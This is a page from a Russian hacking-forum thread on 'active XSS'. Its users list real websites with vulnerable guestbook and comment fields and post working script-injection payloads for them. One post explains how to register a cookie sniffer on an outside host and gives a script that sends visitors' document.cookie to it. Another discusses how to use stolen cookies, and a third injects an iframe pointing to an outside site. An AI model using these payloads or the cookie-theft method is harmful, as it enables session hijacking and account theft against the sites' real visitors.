HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 14 из 54 « Первая < 4 10 11 12 13 14 15 16 17 18 24 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #131  
Старый 20.01.2008, 03:28
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию
http://www.knor.ru/cgi-bin/mag.pl?otziv гостевая полный набор и пасиф и актив

<script>alert(/отжиг/)</script>
зы то что, вчера написано было потерли... а баг видимо не хотят исправлять ну и ладно, я не в обиде, действительно, кому охота копаться в коде, тем более если он не твой )
Последний раз редактировалось xcedz; 20.01.2008 в 16:17..
 
Ответить с цитированием

  #132  
Старый 22.01.2008, 04:17
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
С нами: 9847919

Репутация: 1446


По умолчанию
http://news.nag.ru/news/root/crnews/
Уязвимы комментарии.
Код:
http://news.nag.ru/news/root/crnews/story15827/
 
Ответить с цитированием

  #133  
Старый 22.01.2008, 12:40
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
С нами: 10158236

Репутация: 0
Wink
Цитата:
Сообщение от Lamersha  
народ поскажите что я могу зделать с этой xss тоько в IE пашет?? http://helpdesk.flygroup.st/index.php?="><script>alert(5555)</script>


пробовала это захожу по ссылке() на снифер не чего не приходит в чем может быть проблема?
http://helpdesk.flygroup.st/index.php?="><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>

заранее спасибо
PHP код:
http://s.netsec.ru/ 
регистрируй там сниффер
PHP код:
http://s.netsec.ru/Твой_Логин.gif 
адрес твоего сниффера

PHP код:
<a href="http://s.netsec.ru/Твой_Логин.gif?test">click me</a
вызов по ссылке

PHP код:
<img src="http://s.netsec.ru/Твой_Логин.gif"
код HTML

PHP код:
<script>img = new Image(); img.src "http://s.netsec.ru/Твой_Логин.gif?"+document.cookie;</script
вызов из скрипта

GreenBear
Сниффер от netsec.ru
http://forum.antichat.ru/thread36829-%F1%ED%E8%F4%F4%E5%F0.html
Последний раз редактировалось SSSetuPPP; 22.01.2008 в 21:55..
 
Ответить с цитированием

  #134  
Старый 29.01.2008, 22:41
•†•SyTiNeR•†•
Познающий
Регистрация: 01.01.2008
Сообщений: 91
С нами: 9662666

Репутация: 143
По умолчанию
Цитата:
Сообщение от MaSter GeN  
дико извеняюсь за офф топ достал куки каким образом их использовать если еcть инфа на анти чате дайте ссылочку пожалуйста
Вбей в браузер вроде в Опере есть в настройках куда куки ставлять
 
Ответить с цитированием

  #135  
Старый 30.01.2008, 15:36
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию
www.shinovozoff.ru - онлайн магазин авто-товаров

http://www.shinovozoff.ru/guestbook/
уязвимы все поля ввода, результат =)
 
Ответить с цитированием

  #136  
Старый 03.02.2008, 05:31
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию
www.jino-net.ru

у себя в контрольной панели в поле подсказка пароля пишешь:
Код:
<script>alert(document.cookie)</script>
Затем идёшь восстанавливать пароль:
www.jino-net.ru/lostpass.phtml?login=ЛОГИН
и выскакивает алерт с куками
 
Ответить с цитированием

  #137  
Старый 03.02.2008, 21:43
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию
Код:
gamer.kraslan.ru
в поле комментов втыкаем

Код:
<iframe src= http://you-money.100webspace.net <
рабочая версия

Код:
http://gamer.crownet.ru/index.php?name=Game&pa=preview_game&id=791
Последний раз редактировалось MaSter GeN; 03.02.2008 в 22:04..
 
Ответить с цитированием

  #138  
Старый 06.02.2008, 22:34
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
С нами: 9847919

Репутация: 1446


По умолчанию
auto05.ru

Код:
http://www.auto05.ru/guestbook.html?page=1
Уязвимо поле комментариев.

redyarsk.ru
Код:
http://www.redyarsk.ru/gb/index.php?t=1&all=
Уязвимо поле комментариев.
Последний раз редактировалось Momiji; 06.02.2008 в 23:00..
 
Ответить с цитированием

  #139  
Старый 18.02.2008, 20:59
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию
уууу блин
http://www.pressofatlanticcity.com

постим коммент к новости

Код:
<IMG """><SCRIPT>alert("master gen")</SCRIPT>">
получам
рабочий вариант !
http://www.pressofatlanticcity.com/188/story/84175.html
 
Ответить с цитированием

  #140  
Старый 22.02.2008, 11:55
N1K70
Banned
Регистрация: 02.01.2008
Сообщений: 195
С нами: 9661106

Репутация: 301
Post
http://edsh.org/diskutime/post.php?action=edit&%20fid=24&tid=1172&pid=4303

в заголовке (Subjekti) пишите:

<script>alert(/n1k70/)</script>
 
Ответить с цитированием
Ответ
Страница 14 из 54 « Первая < 4 10 11 12 13 14 15 16 17 18 24 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.